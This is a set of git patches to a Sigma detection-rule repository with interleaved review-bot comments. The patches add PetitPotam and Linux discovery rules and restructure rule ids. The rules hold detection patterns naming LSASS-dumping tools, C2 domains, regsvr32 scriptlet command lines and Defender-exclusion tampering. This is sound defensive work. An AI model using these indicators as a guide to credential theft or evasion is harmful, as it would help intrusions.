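Review bot: The field names `Share_Name`, `Relative_Target_Name` and `Account_Name` are Splunk-style names carried over from the referenced security_content detection, whereas the rest of this repository keys Security events by the raw EventData names (`TargetUserName`, `WorkstationName`, `CallerProcessName` appear in the other rules in this series), so the generic backends and field mappings will not resolve them; the same applies to `Account_Name`, `Certificate_Thumbprint` and `Client_Address` in win_petitpotam_susp_tgt_request.yml. For EventID 5145 the EventData names are `ShareName`, `RelativeTargetName` and `SubjectUserName`, so the selection would read `ShareName: '\\*\IPC$'`, `RelativeTargetName: 'lsarpc'`, `SubjectUserName: 'ANONYMOUS LOGON'` (for 4768 the certificate field is, to my knowledge, `CertThumbprint` and the client address `IpAddress`; worth confirming against a sample event). Both new rules also omit the `status:` field that every other rule in this series carries (`status: experimental` is the norm for a new detection), and quoting `'\\*\IPC$'` removes any doubt about how the unquoted backslashes and `*` are parsed.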
@@ -0,0 +1,34 @@
+title: PetitPotam Suspicious Kerberos TGT Request
+id: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5
+description: Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer
+ certificate by abusing Active Directory Certificate Services in combination with
+ PetitPotam, the next step would be to leverage the certificate for malicious purposes.
+ One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool
+ like Rubeus. This request will generate a 4768 event with some unusual fields depending
+ on the environment. This analytic will require tuning, we recommend filtering Account_Name
+ to the Domain Controller computer accounts.
+author: Mauricio Velazco, Michael Haag
+date: 2021/09/02
+references:
+ - https://github.com/topotam/PetitPotam
+ - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/
+ - https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml
+tags:
+ - attack.credential_access
+ - attack.t1187
+logsource:
+ product: windows
+ service: security
+ definition: 'The advanced audit policy setting "Account Logon > Kerberos Authentication Service" must be configured for Success/Failure'
+detection:
+ selection:
+ EventID: 4768
+ Account_Name|endswith: '$'
+ Certificate_Thumbprint: '*'
+ filter_local:
+ Client_Address: '::1'
+
+ condition: selection and not filter_local
+falsepositives:
+ - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts.
+level: high
From a6bb5574fb01fd768691599526f81e0aba1bffed Mon Sep 17 00:00:00 2001
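Review bot: `Certificate_Thumbprint: '*'` is meant to express "a thumbprint is present", but a bare `*` wildcard is translated differently per backend and can match an empty value, in which case the rule fires on every computer-account 4768 rather than only certificate-based (PKINIT) logons; `Certificate_Thumbprint|re: '.+'` pins the intent, and a comment such as `# thumbprint is only populated for certificate (PKINIT) logons` tells the next reader why the field is there. `filter_local` excludes only the IPv6 loopback `::1`; the IPv4 loopback (`127.0.0.1`, often reported as `::ffff:127.0.0.1`) appears in the same field on dual-stack hosts, so the local filter is incomplete. The description also has a typo ("attacer"), and the stray blank line inside `detection:` is harmless but inconsistent with the other rules. The field-naming and missing `status` points are raised on win_petitpotam_network_share.yml.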
From: frack113 Date: Fri, 3 Sep 2021 06:35:35 +0200 Subject: [PATCH 0718/1367] Update global id --- rules/windows/builtin/win_net_ntlm_downgrade.yml | 3 ++- rules/windows/builtin/win_root_certificate_installed.yml | 3 ++- rules/windows/builtin/win_susp_eventlog_cleared.yml | 3 ++- .../windows/builtin/win_susp_failed_logons_single_source.yml | 3 ++- rules/windows/builtin/win_susp_zip_compress.yml | 4 +++- rules/windows/file_event/sysmon_hack_dumpert.yml | 3 ++- rules/windows/image_load/sysmon_tttracer_mod_load.yml | 3 ++- rules/windows/process_creation/win_advanced_ip_scanner.yml | 3 ++- rules/windows/process_creation/win_apt_turla_commands.yml | 3 ++- rules/windows/process_creation/win_apt_wocao.yml | 3 ++- .../windows/process_creation/win_exchange_transportagent.yml | 3 ++- rules/windows/process_creation/win_hktl_createminidump.yml | 3 ++- rules/windows/process_creation/win_mal_adwind.yml | 4 +++- .../windows/process_creation/win_silenttrinity_stage_use.yml | 3 ++- rules/windows/registry_event/sysmon_apt_pandemic.yml | 3 ++- 15 files changed, 32 insertions(+), 15 deletions(-) diff --git a/rules/windows/builtin/win_net_ntlm_downgrade.yml b/rules/windows/builtin/win_net_ntlm_downgrade.yml index 4269933d..062e6aa5 100644 --- a/rules/windows/builtin/win_net_ntlm_downgrade.yml +++ b/rules/windows/builtin/win_net_ntlm_downgrade.yml @@ -1,6 +1,5 @@ action: global title: NetNTLM Downgrade Attack -id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks @@ -18,6 +17,7 @@ falsepositives: - Unknown level: critical --- +id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 logsource: product: windows category: registry_event @@ -34,6 +34,7 @@ detection: --- # Windows Security Eventlog: Process Creation with Full Command Line +id: d3abac66-f11c-4ed0-8acb-50cc29c97eed logsource: product: windows service: security 
diff --git a/rules/windows/builtin/win_root_certificate_installed.yml b/rules/windows/builtin/win_root_certificate_installed.yml index d0f67207..f670b8f4 100644 --- a/rules/windows/builtin/win_root_certificate_installed.yml +++ b/rules/windows/builtin/win_root_certificate_installed.yml @@ -1,6 +1,5 @@ action: global title: Root Certificate Installed -id: 42821614-9264-4761-acfc-5772c3286f76 status: experimental description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: @@ -16,6 +15,7 @@ falsepositives: detection: condition: 1 of them --- +id: 42821614-9264-4761-acfc-5772c3286f76 logsource: product: windows service: powershell @@ -31,6 +31,7 @@ detection: - 'Import-Certificate' - 'Cert:\LocalMachine\Root' --- +id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc logsource: category: process_creation product: windows diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index e1e90819..ecd5b252 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -1,6 +1,5 @@ action: global title: Eventlog Cleared -id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 type: obsoletes @@ -21,6 +20,7 @@ falsepositives: - System provisioning (system reset before the golden image creation) level: high --- +id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 logsource: product: windows service: security @@ -31,6 +31,7 @@ detection: - 1102 condition: selection --- +id: a62b37e0-45d3-48d9-a517-90c1a1b0186b logsource: product: windows service: system diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index cf0ce27f..b4ad3b78 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml 
+++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,6 +1,5 @@ action: global title: Failed Logins with Different Accounts from Single Source System -id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 @@ -19,6 +18,7 @@ falsepositives: - Workstations with frequently changing users level: medium --- +id: e98374a6-e2d9-4076-9b5c-11bdb2569995 detection: selection1: EventID: @@ -28,6 +28,7 @@ detection: WorkstationName: '*' condition: selection1 | count(TargetUserName) by WorkstationName > 3 --- +id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 detection: selection2: EventID: 4776 diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml index 5534e42b..4f0ab147 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/builtin/win_susp_zip_compress.yml @@ -1,6 +1,5 @@ action: global title: Zip A Folder With PowerShell For Staging In Temp -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 status: experimental author: frack113 date: 2021/07/20 @@ -14,6 +13,7 @@ falsepositives: - Unknown level: medium --- +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 logsource: product: windows category: process_creation @@ -26,6 +26,7 @@ detection: - '$env:TEMP\' condition: selection --- +id: 71ff406e-b633-4989-96ec-bc49d825a412 logsource: product: windows service: powershell-classic @@ -39,6 +40,7 @@ detection: - '$env:TEMP\' condition: selection --- +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 logsource: product: windows service: powershell diff --git a/rules/windows/file_event/sysmon_hack_dumpert.yml b/rules/windows/file_event/sysmon_hack_dumpert.yml index a29ef780..8259b12c 100755 --- a/rules/windows/file_event/sysmon_hack_dumpert.yml +++ b/rules/windows/file_event/sysmon_hack_dumpert.yml 
@@ -1,6 +1,5 @@ action: global title: Dumpert Process Dumper -id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory author: Florian Roth references: @@ -16,6 +15,7 @@ falsepositives: - Very unlikely level: critical --- +id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: Imphash: '09D278F9DE118EF09163C6140255C690' condition: selection --- +id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 logsource: category: file_event product: windows diff --git a/rules/windows/image_load/sysmon_tttracer_mod_load.yml b/rules/windows/image_load/sysmon_tttracer_mod_load.yml index 64f945e8..955ca591 100644 --- a/rules/windows/image_load/sysmon_tttracer_mod_load.yml +++ b/rules/windows/image_load/sysmon_tttracer_mod_load.yml @@ -1,6 +1,5 @@ action: global title: Time Travel Debugging Utility Usage -id: e76c8240-d68f-4773-8880-5c6f63595aaf description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ @@ -19,6 +18,7 @@ falsepositives: - Legitimate usage by software developers/testers level: high --- +id: e76c8240-d68f-4773-8880-5c6f63595aaf logsource: product: windows category: image_load @@ -29,6 +29,7 @@ detection: - '\ttdwriter.dll' - '\ttdloader.dll' --- +id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a logsource: product: windows category: process_creation diff --git a/rules/windows/process_creation/win_advanced_ip_scanner.yml b/rules/windows/process_creation/win_advanced_ip_scanner.yml index a62d7260..92df8008 100644 --- a/rules/windows/process_creation/win_advanced_ip_scanner.yml +++ b/rules/windows/process_creation/win_advanced_ip_scanner.yml 
@@ -1,6 +1,5 @@ action: global title: Advanced IP Scanner -id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: experimental description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: @@ -19,6 +18,7 @@ falsepositives: - Legitimate administrative use level: medium --- +id: bef37fa2-f205-4a7b-b484-0759bfd5f86f logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: Image|contains: '\advanced_ip_scanner' condition: selection --- +id: fed85bf9-e075-4280-9159-fbe8a023d6fa logsource: category: file_event product: windows diff --git a/rules/windows/process_creation/win_apt_turla_commands.yml b/rules/windows/process_creation/win_apt_turla_commands.yml index dc84c432..61b55cf1 100755 --- a/rules/windows/process_creation/win_apt_turla_commands.yml +++ b/rules/windows/process_creation/win_apt_turla_commands.yml @@ -1,6 +1,5 @@ action: global title: Turla Group Lateral Movement -id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f status: experimental description: Detects automated lateral movement by Turla group references: @@ -24,6 +23,7 @@ logsource: falsepositives: - Unknown --- +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f detection: selection: CommandLine: @@ -33,6 +33,7 @@ detection: condition: selection level: critical --- +id: 75925535-ca97-4e0a-a850-00b5c00779dc detection: netCommand1: CommandLine: 'net view /DOMAIN' diff --git a/rules/windows/process_creation/win_apt_wocao.yml b/rules/windows/process_creation/win_apt_wocao.yml index af9a5711..977893ac 100644 --- a/rules/windows/process_creation/win_apt_wocao.yml +++ b/rules/windows/process_creation/win_apt_wocao.yml @@ -1,6 +1,5 @@ action: global title: Operation Wocao Activity -id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d author: Florian Roth, frack113 status: experimental description: Detects activity mentioned in Operation Wocao report 
@@ -25,6 +24,7 @@ falsepositives: - Administrators that use checkadmin.exe tool to enumerate local administrators level: high --- +id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d logsource: product: windows service: security @@ -35,6 +35,7 @@ detection: CallerProcessName|endswith: '\checkadmin.exe' condition: selection --- +id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_exchange_transportagent.yml b/rules/windows/process_creation/win_exchange_transportagent.yml index d432eada..4c7f7cee 100644 --- a/rules/windows/process_creation/win_exchange_transportagent.yml +++ b/rules/windows/process_creation/win_exchange_transportagent.yml @@ -1,6 +1,5 @@ action: global title: MSExchange Transport Agent Installation -id: 83809e84-4475-4b69-bc3e-4aad8568612f status: experimental description: Detects the Installation of a Exchange Transport Agent references: @@ -18,6 +17,7 @@ falsepositives: - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium --- +id: 83809e84-4475-4b69-bc3e-4aad8568612f logsource: product: windows category: process_creation @@ -25,6 +25,7 @@ detection: selection: CommandLine|contains: 'Install-TransportAgent' --- +id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 logsource: product: windows service: msexchange-management diff --git a/rules/windows/process_creation/win_hktl_createminidump.yml b/rules/windows/process_creation/win_hktl_createminidump.yml index 821c3cd9..17e9927c 100644 --- a/rules/windows/process_creation/win_hktl_createminidump.yml +++ b/rules/windows/process_creation/win_hktl_createminidump.yml @@ -1,6 +1,5 @@ action: global title: CreateMiniDump Hacktool -id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth references: 
@@ -14,6 +13,7 @@ falsepositives: - Unknown level: high --- +id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: Imphash: '4a07f944a83e8a7c2525efa35dd30e2f' condition: 1 of them --- +id: db2110f3-479d-42a6-94fb-d35bc1e46492 logsource: product: windows category: file_event diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index d88aa5e3..1dc05a4a 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -1,6 +1,5 @@ action: global title: Adwind RAT / JRAT -id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -18,6 +17,7 @@ detection: condition: selection level: high --- +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: - 'Retrive' - '.vbs ' --- +id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 logsource: category: file_event product: windows @@ -44,6 +45,7 @@ detection: - '\Retrive' - '.vbs' --- +id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 logsource: category: registry_event product: windows diff --git a/rules/windows/process_creation/win_silenttrinity_stage_use.yml b/rules/windows/process_creation/win_silenttrinity_stage_use.yml index 66fa5a3f..d4699449 100644 --- a/rules/windows/process_creation/win_silenttrinity_stage_use.yml +++ b/rules/windows/process_creation/win_silenttrinity_stage_use.yml @@ -1,6 +1,5 @@ action: global title: SILENTTRINITY Stager Execution -id: 03552375-cc2c-4883-bbe4-7958d5a980be status: experimental description: Detects SILENTTRINITY stager use references: 
@@ -18,10 +17,12 @@ falsepositives: - unknown level: high --- +id: 03552375-cc2c-4883-bbe4-7958d5a980be logsource: category: process_creation product: windows --- +id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d logsource: category: image_load product: windows diff --git a/rules/windows/registry_event/sysmon_apt_pandemic.yml b/rules/windows/registry_event/sysmon_apt_pandemic.yml index f53bf33c..e0f2d122 100755 --- a/rules/windows/registry_event/sysmon_apt_pandemic.yml +++ b/rules/windows/registry_event/sysmon_apt_pandemic.yml @@ -1,6 +1,5 @@ action: global title: Pandemic Registry Key -id: 47e0852a-cf81-4494-a8e6-31864f8c86ed status: experimental description: Detects Pandemic Windows Implant references: @@ -22,6 +21,7 @@ falsepositives: - unknown level: critical --- +id: 47e0852a-cf81-4494-a8e6-31864f8c86ed logsource: category: registry_event product: windows @@ -30,6 +30,7 @@ detection: TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance' condition: 1 of them --- +id: 9fefd33c-339d-4495-9cba-b96ca006f512 logsource: category: process_creation product: windows From 135d0a2c61d2941ad29795a8eafe7a579d98e5f5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 3 Sep 2021 06:50:00 +0200 Subject: [PATCH 0719/1367] Update global id --- .../windows/other/win_defender_exclusions.yml | 15 +++++------- .../process_creation/win_apt_chafer_mar18.yml | 5 +++- .../process_creation/win_apt_empiremonkey.yml | 24 +++++++------------ .../process_creation/win_apt_gallium.yml | 3 ++- .../process_creation/win_apt_slingshot.yml | 3 ++- .../win_apt_unidentified_nov_18.yml | 6 ++--- .../win_susp_winrm_AWL_bypass.yml | 3 ++- .../win_syncappvpublishingserver_exe.yml | 3 ++- 8 files changed, 29 insertions(+), 33 deletions(-) diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 29e56c90..5021ed75 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml 
@@ -1,6 +1,5 @@ action: global title: Windows Defender Exclusions Added -id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f description: Detects the Setting of Windows Defender Exclusions date: 2021/07/06 author: Christian Burkard @@ -15,24 +14,22 @@ falsepositives: - Administrator actions level: medium --- +id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f logsource: product: windows service: windefend detection: selection1: - EventID: - - 5007 - New Value|contains: - - '\Microsoft\Windows Defender\Exclusions' + EventID: 5007 + New Value|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection1 --- +id: a982fc9c-6333-4ffb-a51d-addb04e8b529 logsource: product: windows category: registry_event detection: selection2: - EventID: - - 13 - TargetObject|contains: - - '\Microsoft\Windows Defender\Exclusions' + EventID: 13 + TargetObject|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection2 diff --git a/rules/windows/process_creation/win_apt_chafer_mar18.yml b/rules/windows/process_creation/win_apt_chafer_mar18.yml index a64f9629..ad32e036 100755 --- a/rules/windows/process_creation/win_apt_chafer_mar18.yml +++ b/rules/windows/process_creation/win_apt_chafer_mar18.yml @@ -1,6 +1,5 @@ action: global title: Chafer Activity -id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ @@ -26,6 +25,7 @@ falsepositives: - Unknown level: critical --- +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 logsource: product: windows service: system @@ -36,6 +36,7 @@ detection: - 'SC Scheduled Scan' - 'UpdatMachine' --- +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 logsource: product: windows service: security @@ -46,6 +47,7 @@ detection: - 'SC Scheduled Scan' - 'UpdatMachine' --- +id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 logsource: category: registry_event product: windows 
@@ -55,6 +57,7 @@ detection: - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' --- +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_apt_empiremonkey.yml b/rules/windows/process_creation/win_apt_empiremonkey.yml index 55efdc51..93b94f14 100644 --- a/rules/windows/process_creation/win_apt_empiremonkey.yml +++ b/rules/windows/process_creation/win_apt_empiremonkey.yml @@ -1,4 +1,3 @@ -action: global title: Empire Monkey id: 10152a7b-b566-438f-a33c-390b607d1c8d description: Detects EmpireMonkey APT reported Activity @@ -11,24 +10,17 @@ tags: date: 2019/04/02 modified: 2020/08/27 author: Markus Neis -detection: - condition: 1 of them -falsepositives: - - Very Unlikely -level: critical ---- logsource: category: process_creation product: windows detection: selection_cutil: - CommandLine|endswith: - - '/i:%APPDATA%\logs.txt scrobj.dll' - Image|endswith: - - '\cutil.exe' + CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll' + Image|endswith: '\cutil.exe' selection_regsvr32: - CommandLine|endswith: - - '/i:%APPDATA%\logs.txt scrobj.dll' - Description: - - Microsoft(C) Registerserver - + CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll' + Description: 'Microsoft(C) Registerserver' + condition: 1 of them +falsepositives: + - Very Unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/win_apt_gallium.yml index 5ec55428..3c5279f3 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/win_apt_gallium.yml @@ -1,6 +1,5 @@ action: global title: GALLIUM Artefacts -id: 440a56bf-7873-4439-940a-1c8a671073c2 status: experimental description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. author: Tim Burrell 
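Review bot: The rewritten win_apt_empiremonkey.yml ends without a trailing newline (`\ No newline at end of file` after `level: critical`), unlike every other rule file in this series; add the final newline so the file round-trips cleanly through the linters and diff tooling. Collapsing the `action: global` multi-document into a single document is sound here since only one logsource remained, but the commit message ("Update global id") does not mention this structural change, so a short note in the description or commit body would help anyone auditing rule history.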
@@ -42,6 +41,7 @@ detection: - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection --- +id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows service: dns-server @@ -58,6 +58,7 @@ detection: - 'cvdfhjh1231.ddns.net' condition: c2_selection --- +id: 18739897-21b1-41da-8ee4-5b786915a676 logsource: product: windows category: process_creation diff --git a/rules/windows/process_creation/win_apt_slingshot.yml b/rules/windows/process_creation/win_apt_slingshot.yml index 51589931..14205108 100755 --- a/rules/windows/process_creation/win_apt_slingshot.yml +++ b/rules/windows/process_creation/win_apt_slingshot.yml @@ -1,6 +1,5 @@ action: global title: Defrag Deactivation -id: 958d81aa-8566-4cea-a565-59ccd4df27b0 author: Florian Roth, Bartlomiej Czyz (@bczyz1) date: 2019/03/04 modified: 2020/11/05 @@ -16,6 +15,7 @@ falsepositives: - Unknown level: medium --- +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 logsource: category: process_creation product: windows @@ -29,6 +29,7 @@ detection: - '/TN' - '\Microsoft\Windows\Defrag\ScheduledDefrag' --- +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 logsource: product: windows service: security diff --git a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml index 20e60b32..1ff40f48 100644 --- a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml +++ b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml @@ -1,6 +1,5 @@ action: global title: Unidentified Attacker November 2018 -id: 7453575c-a747-40b9-839b-125a0aae324b status: stable description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016. @@ -17,6 +16,7 @@ detection: condition: 1 of them level: high --- +id: 7453575c-a747-40b9-839b-125a0aae324b logsource: category: process_creation product: windows 
@@ -25,11 +25,11 @@ detection: CommandLine|contains: 'cyzfc.dat,' CommandLine|endswith: 'PointFunctionCall' --- +id: 3a3f81ca-652c-482b-adeb-b1c804727f74 # Sysmon: File Creation (ID 11) logsource: product: windows category: file_event detection: selection2: - TargetFilename|contains: - - 'ds7002.lnk' + TargetFilename|contains: 'ds7002.lnk' diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml index 5ed59281..fd21e69f 100644 --- a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml +++ b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml @@ -1,6 +1,5 @@ action: global title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl -id: 074e0ded-6ced-4ebd-8b4d-53f55908119d description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) status: experimental references: @@ -14,6 +13,7 @@ level: medium falsepositives: - Unlikely --- +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: CommandLine|contains: 'winrm' condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) --- +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed logsource: product: windows category: file_event diff --git a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml b/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml index e29504f5..fb4c81e3 100644 --- a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml +++ b/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml 
@@ -1,6 +1,5 @@ action: global title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction -id: fde7929d-8beb-4a4c-b922-be9974671667 description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ @@ -15,6 +14,7 @@ falsepositives: - App-V clients level: medium --- +id: fde7929d-8beb-4a4c-b922-be9974671667 logsource: product: windows category: process_creation @@ -22,6 +22,7 @@ detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' --- +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 logsource: product: windows service: powershell From 11e4b900e44d71bfc76eeb0e1e299c187a6580a3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 3 Sep 2021 06:59:40 +0200 Subject: [PATCH 0720/1367] Update global id --- rules/windows/process_creation/win_apt_gallium.yml | 3 ++- tools/sigma/sigma_uuid.py | 2 -- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/win_apt_gallium.yml index 3c5279f3..41d7f628 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/win_apt_gallium.yml @@ -14,6 +14,7 @@ falsepositives: - unknown level: high --- +id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows category: process_creation @@ -41,7 +42,7 @@ detection: - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection --- -id: 440a56bf-7873-4439-940a-1c8a671073c2 +id: 3db10f25-2527-4b79-8d4b-471eb900ee29 logsource: product: windows service: dns-server diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 8875004b..b9b07f05 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py 
@@ -69,11 +69,9 @@ def main():
 except ValueError: # id is not a valid UUID
 print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"]))
 passed = False
- exit()
 except KeyError: # rule has no id
 print("Rule {} in file {} has no UUID.".format(i, str(path)))
 passed = False
- exit()
 '''
 else:
 newrules = list()
From 864286e2060ce02b5e3d58e3b37ea9552102a9eb Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 3 Sep 2021 11:33:18 +0200 Subject: [PATCH 0721/1367] New Rule - Linux-Auditd-System Information Discovery
--- .../lnx_auditd_system_info_discovery.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_system_info_discovery.yml
diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml
new file mode 100644
index 00000000..56fba47f
--- /dev/null
+++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml
@@ -0,0 +1,30 @@
+title: 'System Information Discovery'
+description: 'Detects System Information Discovery commands'
+author: 'Pawel Mazur'
+status: experimental
+date: 2021/09/03
+references:
+ - 'https://attack.mitre.org/techniques/T1082/'
+ - 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md'
+logsource:
+ product: linux
+ service: auditd
+detection:
+ selection:
+ type: PATH
+ name:
+ - /etc/lsb-release
+ - /etc/redhat-release
+ - /etc/issue
+ condition: 'selection or selection2'
+ selection2:
+ type: EXECVE
+ a0:
+ - uname
+ - uptime
+tags:
+ - attack.discovery
+ - attack.t1082
+falsepositives:
+ - 'Legitimate administrative activity'
+level: low
From adc3c9e6087654ca35968bd33548d254f903acfd Mon Sep 17 00:00:00 2001
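Review bot: With the two `exit()` calls removed, a malformed or missing UUID now only sets `passed = False`, so the process exit status must be derived from `passed` further down for CI to notice a failure; main() continues outside the hunk, so that cannot be verified here. The `'''` immediately after the second `passed = False` suggests this region may sit inside a triple-quoted block, in which case the change has no runtime effect — worth confirming the code is live before relying on it. If it is live, an explicit `sys.exit(0 if passed else 1)` at the end of main() is the clearer form; the builtin `exit()` is a `site` helper meant for interactive sessions rather than scripts, so dropping it from the loop is the right direction.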
